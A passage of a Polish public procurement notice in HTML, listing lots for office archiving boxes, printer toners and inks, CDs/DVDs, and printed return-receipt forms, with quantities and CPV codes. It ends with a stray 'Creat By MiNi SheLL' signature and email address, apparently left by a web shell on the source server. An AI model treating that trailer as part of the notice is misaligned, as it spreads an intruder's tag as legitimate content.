taśma ciągła do drukarki Brother QL-560 - symbol DK-22212 - folia ciągła, 62mm x 15,24 m - kolor biały	szt.	2
Pudło archiwizacyjne na segregator, rozmiar A4/75 mm, kolor biały, posiadające miejsca do opisu na grzbietach i bocznej ścianie, otwór ułatwiający wkładanie i wyjmowanie pudełka z półki, otwierane z boku	szt	20
Pudło archiwizacyjne o formacie A4, grzbiet 80 mm, pojemność 800 kartek,  kolor biały, posiadające miejsca do opisu na grzbietach i bocznej ścianie, otwór ułatwiający wkładanie i wyjmowanie pudełka z półki, otwierane z boku	szt	10
Pudło archiwizacyjne o formacie A4, grzbiet 200 mm, pojemność 2000 kartek,  kolor biały, posiadające miejsca do opisu na grzbietach i bocznej ścianie, otwór ułatwiający wkładanie i wyjmowanie pudełka z półki, otwierane z boku	szt	10
Pudło otwierane z góry, BOXY 100, możliwość umieszczenia opisu na bocznych ściankach, uchwyty ułatwiające przenoszenie, instrukcja składania wydrukowana na pudle	szt	5
Nici bawełniane, waga 10 dkg, długość 80 m, kolor biały, wytrzymałość 10,7 kg, siła zrywania 17,5 kr/Nm	szt	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów eksploatacyjnych do drukarek oraz płyt CD..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Płyta CD-R	700 MB	100
Płyty DVD	4.7 GB	100
Koperta na CD/DVD	biała, nieprzeźroczysta	200
Toner do faxu Panasonic KX-FA83X	oryginalny 100% nowy	2
Bęben do faxu Panasonic KX-FL513	oryginalny 100% nowy	2
Toner do faxu Panasonic KX-MB2025	oryginalny 100% nowy	2
Tusz HP nr 15 (HP DJ 840) - czarny	zamiennik 100% nowy, min. 22 ml	4
Tusz HP nr 17/25 (HP DJ 840) - trójkolor	zamiennik 100% nowy, min. 25 ml	4
Tusz HP nr CD971AE (HP OJ 7000) - czarny	oryginalny 100% nowy	3
Tusz HP nr CD972AE (HP OJ 7000) - cyan	oryginalny 100% nowy	3
Tusz HP nr CD973AE (HP OJ 7000) - magenta	oryginalny 100% nowy	3
Tusz HP nr CD974AE (HP OJ 7000) - żółty	oryginalny 100% nowy	3
Tusz HP nr (HP OJ K7100) - czarny dwupak	oryginalny 100% nowy	1
Tusz HP nr (HP OJ K7100) - trójkolor dwupak	oryginalny 100% nowy	1
Toner XEROX Phaser 3435	zamiennik 100% nowy, min. 10000 str	2
Toner SAMSUNG (ML-1865) - czarny	zamiennik 100% nowy, min. 1500 str	2
Toner HP nr 12 (HP LJ 1020) - czarny	zamiennik 100% nowy, min. 2000 str	40
Toner HP nr 15 (HP LJ 1200) - czarny	zamiennik 100% nowy, min. 2500 str	5
Toner HP nr 35 (HP LJ P1005, P1006) - czarny	zamiennik 100% nowy, min. 1500 str	40
Toner HP nr 85 (HP LJ P1102, M1132) - czarny	zamiennik 100% nowy, min. 1500 str	50
Toner HP nr CE505A (HP LJ P2035) - czarny	oryginalny 100% nowy	10
Toner HP nr Q6470A (HP LJ 3505) - czarny	oryginalny 100% nowy	2
Toner HP nr Q6473A (HP LJ 3505) - magenta	oryginalny 100% nowy	2
Toner HP nr Q6471A (HP LJ 3505) - cyan	oryginalny 100% nowy	2
Toner HP nr Q6472A (HP LJ 3505) - yellow	oryginalny 100% nowy	2
Toner HP nr CC530A (HP LJ CP2025) - czarny	oryginalny 100% nowy	7
Toner HP nr CC533A (HP LJ CP2025) - magenta	oryginalny 100% nowy	7
Toner HP nr CC531A (HP LJ CP2025) - cyan	oryginalny 100% nowy	7
Toner HP nr CC532A (HP LJ CP2025) - yellow	oryginalny 100% nowy	7
Toner HP nr CB540A (HP LJ 1215) - czarny	oryginalny 100% nowy	3
Toner HP nr CB543A (HP LJ 1215) - magenta	oryginalny 100% nowy	2
Toner HP nr CB541A (HP LJ 1215) - cyan	oryginalny 100% nowy	2
Toner HP nr CB542A (HP LJ 1215) - yellow	oryginalny 100% nowy	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa druków - potwierdzenia odbioru.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zwrotne potwierdzenie odbioru. Druk na kartoniku niebieskim min 170 g/m, zgodnie z projektem załącznikiem nr 7	szt.	4000
Zwrotne potwierdzenie odbioru. Druk na kartoniku białym min 170 g/m, perforacja, pasek klejowy zabezpieczony nakładką silikonową szerszą o 5 mm od paska klejowego, co ułatwia odrywanie zabezpieczenia i przyklejenie zwrotki. zgodnie z projektem załącznikiem nr 8	szt.	25000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com